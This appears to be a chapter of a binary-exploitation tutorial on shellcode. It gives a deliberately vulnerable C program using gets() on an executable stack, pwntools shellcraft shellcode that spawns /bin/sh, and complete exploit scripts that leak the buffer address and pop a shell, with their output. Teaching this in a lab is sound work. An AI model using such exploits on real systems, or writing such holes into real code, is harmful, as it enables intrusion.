Definition

In the previous part, we saw that we can redirect the normal execution flow to other functions already present in the binary. Real binaries, however, rarely contain a convenient win() function to jump to.

So what if we want to execute our own code?

This is what we'll learn in this part, using shellcode.

A shellcode is a small piece of machine code, written as assembly instructions and then assembled into raw bytes.

It is usually shown as a sequence of hexadecimal bytes, the opcodes (operation codes) and their operands, and looks something like this:

\x01\x02\x03\x04\x05\x06 ...
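In Python, such a byte sequence is written as a bytes literal. As a small sketch, the five bytes below are copied from the end of the pwntools shellcode shown later in this part, where they encode push 0xb, pop eax and int 0x80. The variable name is only illustrative.

```python
# Five bytes of machine code, written with \x escapes (two hex digits per byte).
# They correspond to: push 0xb ; pop eax ; int 0x80
opcodes = b"\x6a\x0b\x58\xcd\x80"

print(len(opcodes))   # 5
print(opcodes.hex())  # 6a0b58cd80
print(opcodes)        # b'j\x0bX\xcd\x80'
```

The last line shows why a printed shellcode often looks half like text: Python displays any byte that happens to be a printable ASCII character (here 0x6a as j and 0x58 as X) as that character.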

What can we do

With a shellcode, we can do anything the vulnerable process itself is allowed to do. Any instruction the CPU supports can be used, so we could, for example, spawn a /bin/sh shell.

Why does it work

Injecting shellcode and executing it works because of the Von Neumann architecture, which stores data and instructions in the same memory and does not distinguish between them.

So whatever EIP points to will be executed, even if it comes from user input, as long as the bytes decode as valid instructions and the memory they sit in is executable.
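To make this concrete, here is a toy sketch showing that the same bytes can be read as text or as instructions. The input string is the printable beginning of the pwntools shellcode shown later in this part. The decoder is hypothetical and deliberately tiny: it only understands the two x86 push encodings used there (0x6a for an 8-bit immediate, 0x68 for a 32-bit little-endian immediate).

```python
import struct

def decode_pushes(data: bytes) -> list[str]:
    """Toy decoder: understands only 'push imm8' (0x6a) and 'push imm32' (0x68)."""
    instructions = []
    i = 0
    while i < len(data):
        opcode = data[i]
        if opcode == 0x6A:                       # push imm8
            instructions.append(f"push {data[i + 1]:#x}")
            i += 2
        elif opcode == 0x68:                     # push imm32, little-endian operand
            (imm,) = struct.unpack_from("<I", data, i + 1)
            instructions.append(f"push {imm:#x}")
            i += 5
        else:
            raise ValueError(f"opcode {opcode:#x} not handled by this toy decoder")
    return instructions

# Looks like harmless text typed by a user...
user_input = b"jhh///sh/bin"

# ...but the CPU would read it as three push instructions.
for line in decode_pushes(user_input):
    print(line)
# push 0x68
# push 0x732f2f2f
# push 0x6e69622f
```

These three instructions match the first three lines of the assembly listing printed by shellcraft.sh().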

How to use it

So a shellcode is basically just a sequence of machine-code bytes.

A basic exploit using shellcode consists of the following steps:

input the shellcode onto the stack
overwrite the saved return address so that EIP ends up pointing to the shellcode
the shellcode is executed

Why use a shellcode

It's small, and most of the time a buffer overflow leaves only a limited amount of space
You can do anything with it, as long as you can write it

ASLR

ASLR (Address Space Layout Randomization) is a security technique that randomizes where memory regions such as the stack are mapped each time a binary runs. It does not directly prevent shellcode execution, but it makes it harder, because the address of the injected shellcode changes between runs. We will discuss that in detail later.

For this course, to ease our learning, the address of the vulnerable buffer will always be provided.

Keep in mind, though, that ASLR is generally enabled on real systems, and that it can be bypassed.
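On Linux, the current ASLR setting can be read from /proc/sys/kernel/randomize_va_space. The following is a minimal sketch for checking it from Python. The function names and the short descriptions are my own, and the reader simply returns None where the file is missing (for example on a non-Linux system).

```python
from pathlib import Path
from typing import Optional

# Meaning of the values of the Linux randomize_va_space setting.
ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, mmap and shared libraries)",
    2: "full (partial plus heap)",
}

def describe_aslr(value: int) -> str:
    """Turn the numeric setting into a short description."""
    return ASLR_MODES.get(value, "unknown")

def read_aslr_setting(path: str = "/proc/sys/kernel/randomize_va_space") -> Optional[int]:
    """Return the current setting, or None if it cannot be read."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None

setting = read_aslr_setting()
if setting is None:
    print("ASLR setting not available on this system")
else:
    print(f"ASLR: {setting} ({describe_aslr(setting)})")
```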

Generating a shellcode

We will learn how to write our own shellcode at some point, but for now we will use the shellcraft module from pwntools to generate one.

online shellcodes

Please do not execute shellcodes from the Internet.
As explained, a shellcode can do anything, so one from an untrusted source can be very dangerous. The shellcodes generated by pwntools are safe, and they will be enough.

Open Python in REPL (read-eval-print loop) mode from bash

➜  ~ python3
Python 3.11.1 (main, Dec 31 2022, 10:23:59) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>

Import pwntools

>>> from pwn import *

Generate a shellcode for a shell

>>> shellcraft.sh()
"    /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n    /* push b'/bin///sh\\x00' */\n    push 0x68\n    push 0x732f2f2f\n    push 0x6e69622f\n    mov ebx, esp\n    /* push argument array ['sh\\x00'] */\n    /* push 'sh\\x00\\x00' */\n    push 0x1010101\n    xor dword ptr [esp], 0x1016972\n    xor ecx, ecx\n    push ecx /* null terminate */\n    push 4\n    pop ecx\n    add ecx, esp\n    push ecx /* 'sh\\x00' */\n    mov ecx, esp\n    xor edx, edx\n    /* call execve() */\n    push SYS_execve /* 0xb */\n    pop eax\n    int 0x80\n"
>>>

Pretty print the shellcode

>>> print(shellcraft.sh())
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push SYS_execve /* 0xb */
    pop eax
    int 0x80

>>>

This is a simple shellcode generated by pwntools. When executed, it opens a shell.

Assemble the shellcode into machine code

>>> asm(shellcraft.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'
>>>

This is the shellcode as raw bytes, in a format that can be injected in a payload.

We can also print the shellcode as a hexadecimal dump

>>> print(hexdump(asm(shellcraft.sh())))
00000000  6a 68 68 2f  2f 2f 73 68  2f 62 69 6e  89 e3 68 01  │jhh/│//sh│/bin│··h·│
00000010  01 01 01 81  34 24 72 69  01 01 31 c9  51 6a 04 59  │····│4$ri│··1·│Qj·Y│
00000020  01 e1 51 89  e1 31 d2 6a  0b 58 cd 80               │··Q·│·1·j│·X··│
0000002c
>>>
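Before injecting a shellcode, it is worth checking that it contains no byte the input function would choke on. Since gets() stops reading at a newline, a 0x0a byte inside the payload would truncate it. The sketch below rebuilds the bytes from the hex dump above using only the standard library. The helper name find_bad_bytes is hypothetical.

```python
# Hex columns copied from the hexdump above.
HEXDUMP = """
6a 68 68 2f  2f 2f 73 68  2f 62 69 6e  89 e3 68 01
01 01 01 81  34 24 72 69  01 01 31 c9  51 6a 04 59
01 e1 51 89  e1 31 d2 6a  0b 58 cd 80
"""

# bytes.fromhex() ignores the whitespace between the hex pairs.
shellcode = bytes.fromhex(HEXDUMP)

def find_bad_bytes(payload: bytes, bad: bytes = b"\n") -> list[int]:
    """Return the offsets of every byte of `payload` that appears in `bad`."""
    return [i for i, byte in enumerate(payload) if byte in bad]

print(len(shellcode))             # 44, i.e. 0x2c as shown on the last hexdump line
print(find_bad_bytes(shellcode))  # [] -> no newline, safe to send through gets()
```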

Guided example

#include <stdio.h>

void pwnme()
{
    char buffer[100];
    printf("buffer is at %p\n", &buffer);
    puts("overflow me");
    gets(buffer);
}

int main()
{
    pwnme();
    return 0;
}

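Copy and paste the above code into a main.c file.
Then compile it with gcc -m32 -no-pie -z execstack main.c -o main (-m32 builds a 32-bit binary, -no-pie keeps the code at a fixed address, and -z execstack marks the stack as executable so that injected shellcode can run).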

New stack layout

Just like in the ret2win section, we have a buffer that can be overflowed with user input coming from gets().

However, this time, there is no win() function and no flag to print.

The goal here is to inject our own shellcode, point to it, and execute it.

Finding the padding should be trivial by now, so we'll use another technique that automates it inside the exploit script.

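from pwn import *

target = './main'

# Load the binary and let pwntools pick up its architecture (i386)
elf = context.binary = ELF(target)

def find_offset() -> int:
    """Crash the binary with a cyclic pattern and read the offset from the core dump."""
    p = process()
    p.sendline(cyclic(200))                 # unique 4-byte sequences, long enough to overwrite EIP
    p.wait()                                # wait for the process to crash
    core = Coredump('./core')               # core file written by the kernel
    offset = cyclic_find(core.fault_addr)   # position of the faulting EIP value in the pattern
    return offset

padding = find_offset() # should be 112 bytes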
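To see why this works, here is a standard-library sketch of the idea behind cyclic() and cyclic_find(). It generates a de Bruijn sequence over the lowercase alphabet, in which every 4-byte window is unique, and then looks up the little-endian bytes of the faulting EIP. This is my own re-implementation for illustration, not the pwntools code, and the assumption that its output starts like the pwntools pattern (aaaabaaacaaa...) is not taken from the pwntools source. The fault value 0x62616164 is the one that appears in the core dump output further down.

```python
import string
import struct
from itertools import islice

def de_bruijn(alphabet: bytes, n: int):
    """Lazily yield a de Bruijn sequence: every n-byte window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def pattern(length: int) -> bytes:
    """First `length` bytes of the sequence (stand-in for cyclic())."""
    return bytes(islice(de_bruijn(string.ascii_lowercase.encode(), 4), length))

def offset_of(fault_addr: int, length: int = 200) -> int:
    """Offset of a faulting 32-bit value in the pattern (stand-in for cyclic_find())."""
    return pattern(length).find(struct.pack("<I", fault_addr))

print(pattern(16))            # b'aaaabaaacaaadaaa'
print(offset_of(0x62616164))  # 112
```

The value 0x62616164 is the little-endian encoding of the bytes daab, which sit 112 bytes into the pattern. That is exactly the number of bytes needed to reach the saved return address.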

This time, the payload also has to carry our shellcode onto the stack.


So our payload should look like:

[shellcode] + [padding] + [ptr to shellcode]
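This layout can be sketched with the standard library alone. The function below is a hypothetical helper, not part of pwntools: struct.pack("<I", ...) plays the role of p32(), and the 44-byte placeholder of NOP bytes stands in for the real shellcode. The offset 112 and the address 0xffffd5cc are the values used in this part.

```python
import struct

def build_payload(shellcode: bytes, offset: int, buffer_addr: int) -> bytes:
    """Lay out [shellcode] + [padding] + [ptr to shellcode]."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the saved return address")
    padding = b"A" * (offset - len(shellcode))   # fill up to the return address
    pointer = struct.pack("<I", buffer_addr)     # 32-bit little-endian, like p32()
    return shellcode + padding + pointer

placeholder = b"\x90" * 44                       # stand-in for the real shellcode
payload = build_payload(placeholder, 112, 0xFFFFD5CC)

print(len(payload))        # 116 = 112 bytes up to the return address + 4-byte pointer
print(payload[-4:].hex())  # ccd5ffff (the address, least significant byte first)
```

The padding length is computed from the shellcode length so that the pointer always lands exactly on the saved return address, whatever shellcode is used.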

Finding the address of buffer

This section demonstrates the effect of ASLR. GDB disables ASLR for the programs it runs, so the address of the buffer is always the same inside GDB. However, when we run the binary directly several times, it prints a different address each time.

➜  ~ ./main
buffer is at 0xffe6372c
overflow me
^C
➜  ~ ./main
buffer is at 0xffc44e4c
overflow me
^C
➜  ~ ./main
buffer is at 0xffc0a1fc
overflow me
^C

Open the binary in gdb

gdb main

Put a breakpoint on the gets() call (find the offset yourself; you should know how by now)

pwndbg> b *pwnme + 65

Run the binary

pwndbg> r

Get the address of the buffer

► 0x80491c3 <pwnme+65>    call   gets@plt                     <gets@plt>
        arg[0]: 0xffffd5cc ◂— 0xd /* '\r' */
        arg[1]: 0xffffd5cc ◂— 0xd /* '\r' */
        arg[2]: 0xf7fca410 —▸ 0x80482b9 ◂— 'GLIBC_2.0'
        arg[3]: 0x804918e (pwnme+12) ◂— add ebx, 0x2e72

question

What is the address of the buffer?

Hint

Check the arguments to `gets()`

Answer

It's 0xffffd5cc

Writing the exploit

In Python:

from pwn import *

target = './main'

elf = context.binary = ELF(target)

padding = 112
shellcode = asm(shellcraft.sh())

payload = shellcode                            # [shellcode]
payload += b'A' * (padding - len(shellcode))   # [padding]
payload += p32(0xffffd5cc)                     # [ptr to shellcode]

p = process()
print(p.clean())
p.sendline(payload)
p.interactive()                                 # to interact with the shell

Run it:

➜  ~ python3 exploit.py
[*] '/root/main'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments
[+] Starting local process '/root/main': pid 1474
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1474)
[+] Parsing corefile...: Done
[*] '/root/core'
    Arch:      i386-32-little
    EIP:       0x62616164
    ESP:       0xffa80cb0
    Exe:       '/root/main' (0x8048000)
    Fault:     0x62616164
[+] Starting local process '/root/main': pid 1484
b'buffer is at 0xff9e36cc\noverflow me\n'  # <---- buffer is at 0xff9e36cc
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ 
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1484)

It failed because the address we found inside GDB (0xffffd5cc) is different from the real address of the buffer (0xff9e36cc in this run), since ASLR is active outside GDB.

The binary prints that address, so we can retrieve it programmatically by adding a few lines to our exploit:

from pwn import *

target = './main'

elf = context.binary = ELF(target)

def find_offset() -> int:
    p = process()
    p.sendline(cyclic(200))
    p.wait()
    core = Coredump('./core')
    offset = cyclic_find(core.fault_addr)
    return offset

padding = find_offset() # should be 112 bytes

shellcode = asm(shellcraft.sh())

p = process()
p.recvuntil('at ')      # we discard output 'buffer is at '
leaked_address = p.recvline()[:-1]  # we receive the rest of the output, which is the address, and we remove the last part '\n'
address = int(leaked_address, 0)    # we convert the string address into an int, which can be used by p32()

payload = shellcode
payload += b'A' * (padding - len(shellcode))
payload += p32(address)
print(p.clean())
p.sendline(payload)
p.interactive()

➜  ~ python3 exploit.py 
[*] '/root/main'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments
[+] Starting local process '/root/main': pid 1503
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1503)
[+] Parsing corefile...: Done
[*] '/root/core'
    Arch:      i386-32-little
    EIP:       0x62616164
    ESP:       0xffb881d0
    Exe:       '/root/main' (0x8048000)
    Fault:     0x62616164
[+] Starting local process '/root/main': pid 1513
/root/exploit.py:20: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.recvuntil('at ')      # we discard output 'buffer is at '
b'overflow me\n'
[*] Switching to interactive mode
$ ls
core  exploit.py  flag.txt  main  main.c

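Congratulations, you popped your first shell 🎉

The BytesWarning in the output above is harmless: it appears because p.recvuntil('at ') was given a str instead of bytes, and passing b'at ' makes it go away.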
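The address parsing done in the exploit can also be tried on its own, without running the binary. This is a small sketch using only the standard library. The function name parse_leak is hypothetical, and the sample line is the one printed by the binary in the failed run earlier.

```python
def parse_leak(line: bytes) -> int:
    """Extract the address from a line such as b'buffer is at 0xff9e36cc\\n'."""
    prefix = b"buffer is at "
    if not line.startswith(prefix):
        raise ValueError("unexpected output from the target")
    # int() accepts bytes, and base 16 tolerates the leading '0x'
    return int(line[len(prefix):].strip(), 16)

address = parse_leak(b"buffer is at 0xff9e36cc\n")
print(hex(address))  # 0xff9e36cc
```

Checking the prefix first means the exploit stops with a clear error, rather than sending a payload built from a wrong address, if the program prints something unexpected.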

Troubleshooting

If you get the error "core file not found", you may be running on Ubuntu, where the core dump file is generated elsewhere. To fix that (just for this course), run the following commands on your host machine (outside of your Docker container):

echo core | sudo tee /proc/sys/kernel/core_pattern
echo 0 | sudo tee /proc/sys/kernel/core_uses_pid
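To check whether these settings are in place before running the exploit, the two files can be read from Python. The sketch below uses hypothetical helper names. It encodes the condition the commands above establish: the pattern is exactly core and no PID suffix is appended, so the file is written as ./core, where Coredump('./core') expects it.

```python
from pathlib import Path
from typing import Optional

def writes_plain_core(core_pattern: str, core_uses_pid: int) -> bool:
    """True if a crash produces a file named exactly 'core' in the working directory."""
    return core_pattern.strip() == "core" and core_uses_pid == 0

def read_setting(name: str) -> Optional[str]:
    """Read /proc/sys/kernel/<name>, or return None if it is not available."""
    try:
        return Path("/proc/sys/kernel", name).read_text().strip()
    except OSError:
        return None

pattern = read_setting("core_pattern")
uses_pid = read_setting("core_uses_pid")
if pattern is None or uses_pid is None or not uses_pid.isdigit():
    print("core dump settings not available on this system")
elif writes_plain_core(pattern, int(uses_pid)):
    print("core dumps will be written to ./core")
else:
    print(f"core_pattern={pattern!r}, core_uses_pid={uses_pid}: ./core will not be created")
```

A pattern that starts with | means the kernel pipes the dump to a program instead of writing a file, which is one way the core file ends up "elsewhere".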
